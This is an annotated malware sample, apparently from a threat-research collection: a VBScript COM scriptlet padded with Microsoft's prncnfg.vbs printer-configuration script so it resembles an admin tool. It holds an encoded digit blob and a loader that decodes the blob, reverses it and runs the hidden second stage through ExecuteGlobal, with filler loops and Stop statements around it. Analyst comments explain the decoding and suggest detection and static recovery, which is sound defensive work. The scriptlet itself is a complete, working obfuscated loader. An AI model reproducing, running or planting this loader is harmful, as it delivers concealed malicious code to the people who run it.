VBS COM Scriptlet threat
## Uploaded by @JohnLaTwC
## Hash: cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e
## VTLink: https://www.virustotal.com/#/file/cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e/detection
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Pentest"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="VBScript">
' Analyst note: q is the fixed offset of the encoding. The decode loop after the
' w blob subtracts q from each 3-digit decimal group of w to obtain a character code.
q=115
w="12512822522622023121422523218514721522521612512821023114717614717021812512821722014721522521612512814914914717614721023112512821623022321612512822322321221521221622916122922921621523123016116521414717614721023112512822521621923114722421221622923123021722621522521623121216122922921621523123016116521414723122622514721722021623022321612512822322321221521221622916123123222621523123016116521414717614721023112512822521621923114722421221622923123021722621522521623121216123123222621523123016116521414723122622514721722012512815617122014715314714914721416214715221421622723022422621415214915514721421623521616117022914717614716521414723121623012512821023115916521415916623514722422021512512815617122015514717021814722522622023121422523221712512821323223014721522521612512816422014722921621522322621721623121622321621516116423412512816422014721622322021721623121622321621516116423412512823123521622514721622423223021622914722922622922921614722522612512815616422015514716623014721323223012512821323223014721522521612512821623222923115917015916421314715314714914718318819516214719916214718516214722322322022222223021223114914722523222916117022912512823123521622514721622423223021622914722922622922921614722522612512815616421315514716522714721323223012512822522622023121422523221714721522521612512823123521622512512822921623122022322723014715314721923121222721622321321223123221421623521616116623314715314716523414717614716523412512814923914914715314721522023023021621422622922716116623314715314716523414717614716523412512814923914914715314721622421222516116623314715314716523414717614716523412512823022421623122022322621414722522014716623314721921421221614722922621712512816623314722422021512512815617116715915914923023021621422622922721016516622522023414722422622921714715714723121421622321623014915523622921623222821421623521616121621422023322921623022022423422121322614717614723022421623122022322621414723121623012512815614916523322422021420723122622622920716120720717323023122421822422522023414915523
12142162212132262312162181471761472162142202332292162302202242342212132261472312162301251282312352162251472162242322302162291472292262292292161472252261251281561551471652341472252262202312142252322171251282252262202312142252322171472152252161251282312352162251251282292162312202232272301471531472302162312322132202292312312121612162232202171471531471492391491471531471492171491471531471492391491471531471472162372202301612162232202171471531471492391491471531472162242122251612162232202171471531471652181471761471652181251282302162232202171611561632231551472292162152232262172312162181611642341472252201472162232202171472192142122161471472292262171251282312352162251251282292162312202232272301471531472302162312322132202292312312121612292162152232262171471531471492391491471531471492151491471531471492391491471531471491491471531471492391491471531472162242122251612292162152232262171471531471652181471761471652181251282302292162152232262172132322301611561632231551472292162152232262172312162181611642341472252201472292162152232262171472192142122161471472292262171251282292162312202232272301471531471632231471761471652181251281561632231551471652181472252262202312142252322171251282252262202312142252321851472152252161251282312352162251251282172201472152252161251282292162312202232272301471531472162272362312162332202292151612162332202292151471531471492391491471531472192312122271612162332202292151471531471712351471761471712351251282252162192311472162322292311471761472362152122162292302201612162332202292151471471472172201251282302162332202292151611642341472252201472162332202292151472192142122161471472292262171251281561551471712351472252262202312142252322171251282252262202312142252322171472152252161251281682351591672121471531472292162312202232272301471531471492182252202332142162291602302201491471672261251282182252202192312262251471761471632181472312162301251282192312202341472152252161251282162302262232141611251282152122162291611471761471682351251281672121472162232202172242262292172152122262231
6112512822521622722616112512816414717614721622723623116112512816523114721923122023412512815614922421221622923123016121321522621521214915523121421622121322621623121221622921414717614716523114714723121623012512816823515916523114714722422021512512815616721215514717222714722522622023121422523221712512821323223014721522521612512821722014721522521615412512821923121222723122922621923016115622623121623321223022923123015514721622322021723121621816121521222622322523422621522623021722121322614722523222916117022915412512822521621923114715622623121623321223022923123015523023123022023521621622322021716121521222622322523422621522623021722121322614721722015412512821722014721522521612512821822522021923122622514717614714716321814723121623012512821923122023414721522521612512821623022622321416

' Analyst note: loader stub of the scriptlet. It rebuilds a script from the digit
' string w, then runs it with ExecuteGlobal, so the second-stage code never appears
' in clear text in this file. The redundant parentheses around names and literals
' do not change evaluation.

' Filler loop: 401 iterations with an empty If body and a call to y() on
' Rnd-derived arguments. The result t is not read anywhere in the visible code,
' so this looks like noise or a delay rather than part of the decoding - TODO confirm.
For r=(0) To (400) Step (1)
if r mod 20 =(0) then
end if
t=(y)(Rnd mod 5 + r mod 7,Rnd)
next
' Stop only suspends execution when a script debugger is attached; without one it
' has no effect. Presumably left in as noise or to disturb debugging.
stop
' Decode loop: w is consumed in fixed groups of three decimal digits.
' Each group u is converted to a number, q (115) is subtracted, and ChrW of the
' result is appended to i. Example from the blob: "125" gives 10, "128" gives 13.
For r =(0) To ((len)((w))/3)-1 Step 1
u=(mid)((w),(r*3)+(1),(3))
i=(i) & (chrw)((u-q))
Next
stop
' The decoded text is stored back to front; StrReverse restores the original order.
i=(StrReverse)((i))
' Execution point of the second stage: the decoded string is run as VBScript in the
' global scope. For triage, the payload can be recovered statically by repeating the
' arithmetic above on w instead of running the sample. Detection logic should key on
' the decode-then-ExecuteGlobal pattern, since the literal payload text is absent here.
' The Function y and the commented-out prncnfg.vbs text that follow are not used by
' the decoding itself; presumably padding that makes the file resemble a Microsoft
' admin script.
executeglobal(("")& (i))
Function y(sMessage, strKey)
Dim o, p, aa, i, j, temp
Dim ss(256), k(256)
o= (Len)((strKey))
For i = (0) To (255)
k(i) = (asc)((Mid)((strKey), ((i Mod o)) + 1, 1))
Next
For i = (0) To (255)
j = (j + k(i) + ss(i)) Mod 256
Next
stop
For i = (1) To (1400)
p = (p + 1) Mod 25
aa= (aa+ ss(p)) Mod 256
Next
stop
For i = (1) To (Len)((sMessage))
p = (p + 1) Mod 256
p= (aa+ ss(p)) Mod 256
y =(y)& (ss((ss(p) + ss(aa)) Mod 256) & (Mid(sMessage, i, 1))) & (",")
Next
stop
''----------------------------------------------------------------------
''
'' Copyright (c) Microsoft Corporation. All rights reserved.
''
'' Abstract:
''
'' prncnfg.vbs - printer configuration script for WMI on Windows used to get
'' and set printer configuration also used to rename a printer
''
'' Usage:
'' prncnfg [-gtx?] [-s server] [-p printer] [-u user name] [-w password]
'' [-z new printer name] [-r port name] [-l location] [-m comment]
'' [-h share name] [-f sep-file] [-y data-type] [-st start time]
'' [-ut until time] [-o priority] [-i default priority]
'' [<+|->rawonly][<+|->keepprintedjobs][<+|->queued][<+|->workoffline]
'' [<+|->enabledevq][<+|->docompletefirst][<+|->enablebidi]
''
'' Examples:
'' prncnfg -g -s server -p printer
'' prncnfg -x -p printer -w "new Printer"
'' prncnfg -t -s server -p Printer -l "Building A/Floor 100/Office 1" -m "Color Printer"
'' prncnfg -t -p printer -h "Share" +shared -direct
'' prncnfg -t -p printer +rawonly +keepprintedjobs
'' prncnfg -t -p printer -st 2300 -ut 0215 -o 10 -i 5
''
''----------------------------------------------------------------------
'
'option explicit
'
''
'' Debugging trace flags, to enable debug output trace message
'' change gDebugFlag to true.
''
'const kDebugTrace = 1
'const kDebugError = 2
'dim gDebugFlag
'
'gDebugFlag = false
'
'const kFlagUpdateOnly = 1
'
''
'' Operation action values.
''
'const kActionUnknown = 0
'const kActionSet = 1
'const kActionGet = 2
'const kActionRename = 3
'
'const kErrorSuccess = 0
'const kErrorFailure = 1
'
''
'' Constants for the parameter dictionary
''
'const kServerName = 1
'const kPrinterName = 2
'const kNewPrinterName = 3
'const kShareName = 4
'const kPortName = 5
'const kDriverName = 6
'const kComment = 7
'const kLocation = 8
'const kSepFile = 9
'const kPrintProc = 10
'const kDataType = 11
'const kParameters = 12
'const kPriority = 13
'const kDefaultPriority = 14
'const kStartTime = 15
'const kUntilTime = 16
'const kQueued = 17
'const kDirect = 18
'const kDefault = 19
'const kShared = 20
'const kNetwork = 21
'const kHidden = 23
'const kLocal = 24
'const kEnableDevq = 25
'const kKeepPrintedJobs = 26
'const kDoCompleteFirst = 27
'const kWorkOffline = 28
'const kEnableBidi = 29
'const kRawOnly = 30
'const kPublished = 31
'const kUserName = 32
'const kPassword = 33
'
'const kNameSpace = "root\cimv2"
'
''
'' Generic strings
''
'const L_Empty_Text = ""
'const L_Space_Text = " "
'const L_Error_Text = "Error"
'const L_Success_Text = "Success"
'const L_Failed_Text = "Failed"
'const L_Hex_Text = "0x"
'const L_Printer_Text = "Printer"
'const L_Operation_Text = "Operation"
'const L_Provider_Text = "Provider"
'const L_Description_Text = "Description"
'const L_Debug_Text = "Debug:"
'
''
'' General usage messages
''
'const L_Help_Help_General01_Text = "Usage: prncnfg [-gtx?] [-s server][-p printer][-z new printer name]"
'const L_Help_Help_General02_Text = " [-u user name][-w password][-r port name][-l location]"
'const L_Help_Help_General03_Text = " [-m comment][-h share name][-f sep file][-y datatype]"
'const L_Help_Help_General04_Text = " [-st start time][-ut until time][-i default priority]"
'const L_Help_Help_General05_Text = " [-o priority][<+|->shared][<+|->direct][<+|->hidden]"
'const L_Help_Help_General06_Text = " [<+|->published][<+|->rawonly][<+|->queued][<+|->enablebidi]"
'const L_Help_Help_General07_Text = " [<+|->keepprintedjobs][<+|->workoffline][<+|->enabledevq]"
'const L_Help_Help_General08_Text = " [<+|->docompletefirst]"
'const L_Help_Help_General09_Text = "Arguments:"
'const L_Help_Help_General10_Text = "-f - separator file name"
'const L_Help_Help_General11_Text = "-g - get configuration"
'const L_Help_Help_General12_Text = "-h - share name"
'const L_Help_Help_General13_Text = "-i - default priority"
'const L_Help_Help_General14_Text = "-l - location string"
'const L_Help_Help_General15_Text = "-m - comment string"
'const L_Help_Help_General16_Text = "-o - priority"
'const L_Help_Help_General17_Text = "-p - printer name"
'const L_Help_Help_General18_Text = "-r - port name"
'const L_Help_Help_General19_Text = "-s - server name"
'const L_Help_Help_General20_Text = "-st - start time"
'const L_Help_Help_General21_Text = "-t - set configuration"
'const L_Help_Help_General22_Text = "-u - user name"
'const L_Help_Help_General23_Text = "-ut - until time"
'const L_Help_Help_General24_Text = "-w - password"
'const L_Help_Help_General25_Text = "-x - change printer name"
'const L_Help_Help_General26_Text = "-y - data type string"
'const L_Help_Help_General27_Text = "-z - new printer name"
'const L_Help_Help_General28_Text = "-? - display command usage"
'const L_Help_Help_General29_Text = "Examples:"
'const L_Help_Help_General30_Text = "prncnfg -g -s server -p printer"
'const L_Help_Help_General31_Text = "prncnfg -x -s server -p printer -z ""new printer"""
'const L_Help_Help_General32_Text = "prncnfg -t -p printer -l ""Building A/Floor 100/Office 1"" -m ""Color Printer"""
'const L_Help_Help_General33_Text = "prncnfg -t -p printer -h ""Share"" +shared -direct"
'const L_Help_Help_General34_Text = "prncnfg -t -p printer +rawonly +keepprintedjobs"
'const L_Help_Help_General35_Text = "prncnfg -t -p printer -st 2300 -ut 0215 -o 1 -i 5"
'
''
'' Messages to be displayed if the scripting host is not cscript
''
'const L_Help_Help_Host01_Text = "This script should be executed from the Command Prompt using CScript.exe."
'const L_Help_Help_Host02_Text = "For example: CScript script.vbs arguments"
'const L_Help_Help_Host03_Text = ""
'const L_Help_Help_Host04_Text = "To set CScript as the default application to run .VBS files run the following:"
'const L_Help_Help_Host05_Text = " CScript //H:CScript //S"
'const L_Help_Help_Host06_Text = "You can then run ""script.vbs arguments"" without preceding the script with CScript."
'
''
'' General error messages
''
'const L_Text_Error_General01_Text = "The scripting host could not be determined."
'const L_Text_Error_General02_Text = "Unable to parse command line."
'const L_Text_Error_General03_Text = "Win32 error code"
'
''
'' Miscellaneous messages
''
'const L_Text_Msg_General01_Text = "Renamed printer"
'const L_Text_Msg_General02_Text = "New printer name"
'const L_Text_Msg_General03_Text = "Unable to rename printer"
'const L_Text_Msg_General04_Text = "Unable to get configuration for printer"
'const L_Text_Msg_General05_Text = "Printer always available"
'const L_Text_Msg_General06_Text = "Configured printer"
'const L_Text_Msg_General07_Text = "Unable to configure printer"
'const L_Text_Msg_General08_Text = "Unable to get SWbemLocator object"
'const L_Text_Msg_General09_Text = "Unable to connect to WMI service"
'const L_Text_Msg_General10_Text = "Printer status"
'const L_Text_Msg_General11_Text = "Extended printer status"
'const L_Text_Msg_General12_Text = "Detected error state"
'const L_Text_Msg_General13_Text = "Extended detected error state"
'
''
'' Printer properties
''
'const L_Text_Msg_Printer01_Text = "Server name"
'const L_Text_Msg_Printer02_Text = "Printer name"
'const L_Text_Msg_Printer03_Text = "Share name"
'const L_Text_Msg_Printer04_Text = "Driver name"
'const L_Text_Msg_Printer05_Text = "Port name"
'const L_Text_Msg_Printer06_Text = "Comment"
'const L_Text_Msg_Printer07_Text = "Location"
'const L_Text_Msg_Printer08_Text = "Separator file"
'const L_Text_Msg_Printer09_Text = "Print processor"
'const L_Text_Msg_Printer10_Text = "Data type"
'const L_Text_Msg_Printer11_Text = "Parameters"
'const L_Text_Msg_Printer12_Text = "Attributes"
'const L_Text_Msg_Printer13_Text = "Priority"
'const L_Text_Msg_Printer14_Text = "Default priority"
'const L_Text_Msg_Printer15_Text = "Start time"
'const L_Text_Msg_Printer16_Text = "Until time"
'const L_Text_Msg_Printer17_Text = "Status"
'const L_Text_Msg_Printer18_Text = "Job count"
'const L_Text_Msg_Printer19_Text = "Average pages per minute"
'
''
'' Printer attributes
''
'const L_Text_Msg_Attrib01_Text = "direct"
'const L_Text_Msg_Attrib02_Text = "raw_only"
'const L_Text_Msg_Attrib03_Text = "local"
'const L_Text_Msg_Attrib04_Text = "shared"
'const L_Text_Msg_Attrib05_Text = "keep_printed_jobs"
'const L_Text_Msg_Attrib06_Text = "published"
'const L_Text_Msg_Attrib07_Text = "queued"
'const L_Text_Msg_Attrib08_Text = "default"
'const L_Text_Msg_Attrib09_Text = "network"
'const L_Text_Msg_Attrib10_Text = "enable_bidi"
'const L_Text_Msg_Attrib11_Text = "do_complete_first"
'const L_Text_Msg_Attrib12_Text = "work_offline"
'const L_Text_Msg_Attrib13_Text = "hidden"
'const L_Text_Msg_Attrib14_Text = "enable_devq_print"
'
''
'' Printer status
''
'const L_Text_Msg_Status01_Text = "Other"
'const L_Text_Msg_Status02_Text = "Unknown"
'const L_Text_Msg_Status03_Text = "Idle"
'const L_Text_Msg_Status04_Text = "Printing"
'const L_Text_Msg_Status05_Text = "Warmup"
'const L_Text_Msg_Status06_Text = "Stopped printing"
'const L_Text_Msg_Status07_Text = "Offline"
'const L_Text_Msg_Status08_Text = "Paused"
'const L_Text_Msg_Status09_Text = "Error"
'const L_Text_Msg_Status10_Text = "Busy"
'const L_Text_Msg_Status11_Text = "Not available"
'const L_Text_Msg_Status12_Text = "Waiting"
'const L_Text_Msg_Status13_Text = "Processing"
'const L_Text_Msg_Status14_Text = "Initializing"
'const L_Text_Msg_Status15_Text = "Power save"
'const L_Text_Msg_Status16_Text = "Pending deletion"
'const L_Text_Msg_Status17_Text = "I/O active"
'const L_Text_Msg_Status18_Text = "Manual feed"
'const L_Text_Msg_Status19_Text = "No error"
'const L_Text_Msg_Status20_Text = "Low paper"
'const L_Text_Msg_Status21_Text = "No paper"
'const L_Text_Msg_Status22_Text = "Low toner"
'const L_Text_Msg_Status23_Text = "No toner"
'const L_Text_Msg_Status24_Text = "Door open"
'const L_Text_Msg_Status25_Text = "Jammed"
'const L_Text_Msg_Status26_Text = "Service requested"
'const L_Text_Msg_Status27_Text = "Output bin full"
'const L_Text_Msg_Status28_Text = "Paper problem"
'const L_Text_Msg_Status29_Text = "Cannot print page"
'const L_Text_Msg_Status30_Text = "User intervention required"
'const L_Text_Msg_Status31_Text = "Out of memory"
'const L_Text_Msg_Status32_Text = "Server unknown"
'
'
''
'' Debug messages
''
'const L_Text_Dbg_Msg01_Text = "In function RenamePrinter"
'const L_Text_Dbg_Msg02_Text = "New printer name"
'const L_Text_Dbg_Msg03_Text = "In function GetPrinter"
'const L_Text_Dbg_Msg04_Text = "In function SetPrinter"
'const L_Text_Dbg_Msg05_Text = "In function ParseCommandLine"
'
'main
'
''
'' Main execution starts here
''
'sub main
'
' dim iAction
' dim iRetval
' dim oParamDict
'
' '
' ' Abort if the host is not cscript
' '
' if not IsHostCscript() then
'
'' call 'wscript.echo(L_Help_Help_Host01_Text & vbCRLF & L_Help_Help_Host02_Text & vbCRLF & _
' ' L_Help_Help_Host03_Text & vbCRLF & L_Help_Help_Host04_Text & vbCRLF & _
' ' L_Help_Help_Host05_Text & vbCRLF & L_Help_Help_Host06_Text & vbCRLF)
'
'' wscript.quit
'
' end if
'
' set oParamDict = CreateObject("Scripting.Dictionary")
'
' iRetval = ParseCommandLine(iAction, oParamDict)
'
' if iRetval = kErrorSuccess then
'
' select case iAction
'
' case kActionSet
' iRetval = SetPrinter(oParamDict)
'
' case kActionGet
' iRetval = GetPrinter(oParamDict)
'
' case kActionRename
' iRetval = RenamePrinter(oParamDict)
'
' case else
' Usage(True)
' exit sub
'
' end select
'
' end if
'
'end sub
'
''
'' Rename printer
''
'function RenamePrinter(oParamDict)
'
' on error resume next
'
' DebugPrint kDebugTrace, L_Text_Dbg_Msg01_Text
' DebugPrint kDebugTrace, L_Text_Msg_Printer01_Text & L_Space_Text & oParamDict.Item(kServerName)
' DebugPrint kDebugTrace, L_Text_Msg_Printer02_Text & L_Space_Text & oParamDict.Item(kPrinterName)
' DebugPrint kDebugTrace, L_Text_Dbg_Msg02_Text & L_Space_Text & oParamDict.Item(kNewPrinterName)
'
' dim oPrinter
' dim oService
' dim iRetval
' dim uResult
' dim strServer
' dim strPrinter
' dim strNewName
' dim strUser
' dim strPassword
'
' iRetval = kErrorFailure
'
' strServer = oParamDict.Item(kServerName)
' strPrinter = oParamDict.Item(kPrinterName)
' strNewName = oParamDict.Item(kNewPrinterName)
' strUser = oParamDict.Item(kUserName)
' strPassword = oParamDict.Item(kPassword)
'
' if WmiConnect(strServer, kNameSpace, strUser, strPassword, oService) then
'
' set oPrinter = oService.Get("Win32_Printer.DeviceID='" & strPrinter & "'")
'
' else
'
' RenamePrinter = kErrorFailure
'
' exit function
'
' end if
'
' '
' ' Check if Get was successful
' '
' if Err.Number = kErrorSuccess then
'
' uResult = oPrinter.RenamePrinter(strNewName)
'
' if Err.Number = kErrorSuccess then
'
' if uResult = kErrorSuccess then
'
'
' iRetval = kErrorSuccess
'
' else
'
' 'wscript.echo L_Text_Msg_General03_Text & L_Space_Text & strPrinter & L_Space_Text _
'' & L_Text_Error_General03_Text & L_Space_Text & uResult
'
' end if
'
' else
'
' 'wscript.echo L_Text_Msg_General04_Text & L_Space_Text & strPrinter & L_Space_Text _
' & L_Error_Text & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' end if
'
' else
'
' 'wscript.echo L_Text_Msg_General04_Text & L_Space_Text & strPrinter & L_Space_Text _
' & L_Error_Text & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' '
' ' Try getting extended error information
' '
' call LastError()
'
' end if
'
' RenamePrinter = iRetval
'
'end function
'
''
'' Get printer configuration
''
'function GetPrinter(oParamDict)
'
' on error resume next
'
' DebugPrint kDebugTrace, L_Text_Dbg_Msg03_Text
' DebugPrint kDebugTrace, L_Text_Msg_Printer01_Text & L_Space_Text & oParamDict.Item(kServerName)
' DebugPrint kDebugTrace, L_Text_Msg_Printer02_Text & L_Space_Text & oParamDict.Item(kPrinterName)
'
' dim oPrinter
' dim oService
' dim iRetval
' dim uResult
' dim strServer
' dim strPrinter
' dim strAttributes
' dim strStart
' dim strEnd
' dim strUser
' dim strPassword
'
' iRetval = kErrorFailure
'
' strServer = oParamDict.Item(kServerName)
' strPrinter = oParamDict.Item(kPrinterName)
' strUser = oParamDict.Item(kUserName)
' strPassword = oParamDict.Item(kPassword)
'
' if WmiConnect(strServer, kNameSpace, strUser, strPassword, oService) then
'
' set oPrinter = oService.Get("Win32_Printer='" & strPrinter & "'")
'
' else
'
' GetPrinter = kErrorFailure
'
' exit function
'
' end if
'
' '
' ' Check if Get was successful
' '
' if Err.Number = kErrorSuccess then
'
' 'wscript.echo L_Text_Msg_Printer01_Text & L_Space_Text & strServer
' 'wscript.echo L_Text_Msg_Printer02_Text & L_Space_Text & oPrinter.DeviceID
' 'wscript.echo L_Text_Msg_Printer03_Text & L_Space_Text & oPrinter.ShareName
' 'wscript.echo L_Text_Msg_Printer04_Text & L_Space_Text & oPrinter.DriverName
' 'wscript.echo L_Text_Msg_Printer05_Text & L_Space_Text & oPrinter.PortName
' 'wscript.echo L_Text_Msg_Printer06_Text & L_Space_Text & oPrinter.Comment
' 'wscript.echo L_Text_Msg_Printer07_Text & L_Space_Text & oPrinter.Location
' 'wscript.echo L_Text_Msg_Printer08_Text & L_Space_Text & oPrinter.SeparatorFile
' 'wscript.echo L_Text_Msg_Printer09_Text & L_Space_Text & oPrinter.PrintProcessor
' 'wscript.echo L_Text_Msg_Printer10_Text & L_Space_Text & oPrinter.PrintJobDatatype
' 'wscript.echo L_Text_Msg_Printer11_Text & L_Space_Text & oPrinter.Parameters
' 'wscript.echo L_Text_Msg_Printer13_Text & L_Space_Text & CStr(oPrinter.Priority)
' 'wscript.echo L_Text_Msg_Printer14_Text & L_Space_Text & CStr(oPrinter.DefaultPriority)
'
' strStart = Mid(CStr(oPrinter.StartTime), 9, 4)
' strEnd = Mid(CStr(oPrinter.UntilTime), 9, 4)
'
' if strStart <> "" and strEnd <> "" then
'
' 'wscript.echo L_Text_Msg_Printer15_Text & L_Space_Text & Mid(strStart, 1, 2) & "h" & Mid(strStart, 3, 2)
' 'wscript.echo L_Text_Msg_Printer16_Text & L_Space_Text & Mid(strEnd, 1, 2) & "h" & Mid(strEnd, 3, 2)
'
' else
'
' 'wscript.echo L_Text_Msg_General05_Text
'
' end if
'
' strAttributes = L_Text_Msg_Printer12_Text
'
' if oPrinter.Direct then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib01_Text
'
' end if
'
' if oPrinter.RawOnly then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib02_Text
'
' end if
'
' if oPrinter.Local then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib03_Text
'
' end if
'
' if oPrinter.Shared then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib04_Text
'
' end if
'
' if oPrinter.KeepPrintedJobs then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib05_Text
'
' end if
'
' if oPrinter.Published then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib06_Text
'
' end if
'
' if oPrinter.Queued then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib07_Text
'
' end if
'
' if oPrinter.Default then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib08_Text
'
' end if
'
' if oPrinter.Network then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib09_Text
'
' end if
'
' if oPrinter.EnableBiDi then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib10_Text
'
' end if
'
' if oPrinter.DoCompleteFirst then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib11_Text
'
' end if
'
' if oPrinter.WorkOffline then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib12_Text
'
' end if
'
' if oPrinter.Hidden then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib13_Text
'
' end if
'
' if oPrinter.EnableDevQueryPrint then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib14_Text
'
' end if
'
'
' iRetval = kErrorSuccess
'
' else
'
' 'wscript.echo L_Text_Msg_General04_Text & L_Space_Text & oParamDict.Item(kPrinterName) & L_Space_Text _
' & L_Error_Text & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' '
' ' Try getting extended error information
' '
' call LastError()
'
' end if
'
' GetPrinter = iRetval
'
'end function
'
''
'' Configure a printer
''
'function SetPrinter(oParamDict)
'
' on error resume next
'
' DebugPrint kDebugTrace, L_Text_Dbg_Msg04_Text
' DebugPrint kDebugTrace, L_Text_Msg_Printer01_Text & L_Space_Text & oParamDict.Item(kServerName)
' DebugPrint kDebugTrace, L_Text_Msg_Printer02_Text & L_Space_Text & oParamDict.Item(kPrinterName)
'
' dim oPrinter
' dim oService
' dim iRetval
' dim uResult
' dim strServer
' dim strPrinter
' dim strUser
' dim strPassword
'
' iRetval = kErrorFailure
'
' strServer = oParamDict.Item(kServerName)
' strPrinter = oParamDict.Item(kPrinterName)
' strNewName = oParamDict.Item(kNewPrinterName)
' strUser = oParamDict.Item(kUserName)
' strPassword = oParamDict.Item(kPassword)
'
' if WmiConnect(strServer, kNameSpace, strUser, strPassword, oService) then
'
' set oPrinter = oService.Get("Win32_Printer='" & strPrinter & "'")
'
' else
'
' SetPrinter = kErrorFailure
'
' exit function
'
' end if
'
' '
' ' Check if Get was successful
' '
' if Err.Number = kErrorSuccess then
'
' if oParamdict.Exists(kPortName) then oPrinter.PortName = oParamDict.Item(kPortName) end if
' if oParamdict.Exists(kDriverName) then oPrinter.DriverName = oParamDict.Item(kDriverName) end if
' if oParamdict.Exists(kShareName) then oPrinter.ShareName = oParamDict.Item(kShareName) end if
' if oParamdict.Exists(kLocation) then oPrinter.Location = oParamDict.Item(kLocation) end if
' if oParamdict.Exists(kComment) then oPrinter.Comment = oParamDict.Item(kComment) end if
' if oParamdict.Exists(kDataType) then oPrinter.PrintJobDataType = oParamDict.Item(kDataType) end if
' if oParamdict.Exists(kSepFile) then oPrinter.SeparatorFile = oParamDict.Item(kSepfile) end if
' if oParamdict.Exists(kParameters) then oPrinter.Parameters = oParamDict.Item(kParameters) end if
' if oParamdict.Exists(kPriority) then oPrinter.Priority = oParamDict.Item(kPriority) end if
' if oParamdict.Exists(kDefaultPriority) then oPrinter.DefaultPriority = oParamDict.Item(kDefaultPriority) end if
' if oParamdict.Exists(kPrintProc) then oPrinter.PrintProc = oParamDict.Item(kPrintProc) end if
' if oParamdict.Exists(kStartTime) then oPrinter.StartTime = oParamDict.Item(kStartTime) end if
' if oParamdict.Exists(kUntilTime) then oPrinter.UntilTime = oParamDict.Item(kUntilTime) end if
' if oParamdict.Exists(kQueued) then oPrinter.Queued = oParamDict.Item(kQueued) end if
' if oParamdict.Exists(kDirect) then oPrinter.Direct = oParamDict.Item(kDirect) end if
' if oParamdict.Exists(kShared) then oPrinter.Shared = oParamDict.Item(kShared) end if
' if oParamdict.Exists(kHidden) then oPrinter.Hidden = oParamDict.Item(kHidden) end if
' if oParamdict.Exists(kEnabledevq) then oPrinter.EnableDevQueryPrint = oParamDict.Item(kEnabledevq) end if
' if oParamdict.Exists(kKeepPrintedJobs) then oPrinter.KeepPrintedJobs = oParamDict.Item(kKeepPrintedJobs) end if
' if oParamdict.Exists(kDoCompleteFirst) then oPrinter.DoCompleteFirst = oParamDict.Item(kDoCompleteFirst) end if
' if oParamdict.Exists(kWorkOffline) then oPrinter.WorkOffline = oParamDict.Item(kWorkOffline) end if
' if oParamdict.Exists(kEnableBidi) then oPrinter.EnableBidi = oParamDict.Item(kEnableBidi) end if
' if oParamdict.Exists(kRawonly) then oPrinter.RawOnly = oParamDict.Item(kRawonly) end if
' if oParamdict.Exists(kPublished) then oPrinter.Published = oParamDict.Item(kPublished) end if
'
' oPrinter.Put_(kFlagUpdateOnly)
'
' if Err.Number = kErrorSuccess then
'
' 'wscript.echo L_Text_Msg_General06_Text & L_Space_Text & strPrinter
'
' iRetval = kErrorSuccess
'
' else
'
' 'wscript.echo L_Text_Msg_General07_Text & L_Space_Text & strPrinter & L_Space_Text _
' & L_Error_Text & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' '
' ' Try getting extended error information
' '
' call LastError()
'
' end if
'
' else
'
' 'wscript.echo L_Text_Msg_General04_Text & L_Space_Text & strPrinter & L_Space_Text _
' & L_Error_Text & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' '
' ' Try getting extended error information
' '
' call LastError()
'
' end if
'
' SetPrinter = iRetval
'
'end function
'
''
'' Converts the printer status to a string
''
'function PrnStatusToString(Status)
'
' dim str
'
' str = L_Empty_Text
'
' select case Status
'
' case 1
' str = str + L_Text_Msg_Status01_Text + L_Space_Text
'
' case 2
' str = str + L_Text_Msg_Status02_Text + L_Space_Text
'
' case 3
' str = str + L_Text_Msg_Status03_Text + L_Space_Text
'
' case 4
' str = str + L_Text_Msg_Status04_Text + L_Space_Text
'
' case 5
' str = str + L_Text_Msg_Status05_Text + L_Space_Text
'
' case 6
' str = str + L_Text_Msg_Status06_Text + L_Space_Text
'
' case 7
' str = str + L_Text_Msg_Status07_Text + L_Space_Text
'
' end select
'
' PrnStatusToString = str
'
'end function
'
''
'' Converts the extended printer status to a string
''
'function ExtPrnStatusToString(Status)
'
' dim str
'
' str = L_Empty_Text
'
' select case Status
'
' case 1
' str = str + L_Text_Msg_Status01_Text + L_Space_Text
'
' case 2
' str = str + L_Text_Msg_Status02_Text + L_Space_Text
'
' case 3
' str = str + L_Text_Msg_Status03_Text + L_Space_Text
'
' case 4
' str = str + L_Text_Msg_Status04_Text + L_Space_Text
'
' case 5
' str = str + L_Text_Msg_Status05_Text + L_Space_Text
'
' case 6
' str = str + L_Text_Msg_Status06_Text + L_Space_Text
'
' case 7
' str = str + L_Text_Msg_Status07_Text + L_Space_Text
'
' case 8
' str = str + L_Text_Msg_Status08_Text + L_Space_Text
'
' case 9
' str = str + L_Text_Msg_Status09_Text + L_Space_Text
'
' case 10
' str = str + L_Text_Msg_Status10_Text + L_Space_Text
'
' case 11
' str = str + L_Text_Msg_Status11_Text + L_Space_Text
'
' case 12
' str = str + L_Text_Msg_Status12_Text + L_Space_Text
'
' case 13
' str = str + L_Text_Msg_Status13_Text + L_Space_Text
'
' case 14
' str = str + L_Text_Msg_Status14_Text + L_Space_Text
'
' case 15
' str = str + L_Text_Msg_Status15_Text + L_Space_Text
'
' case 16
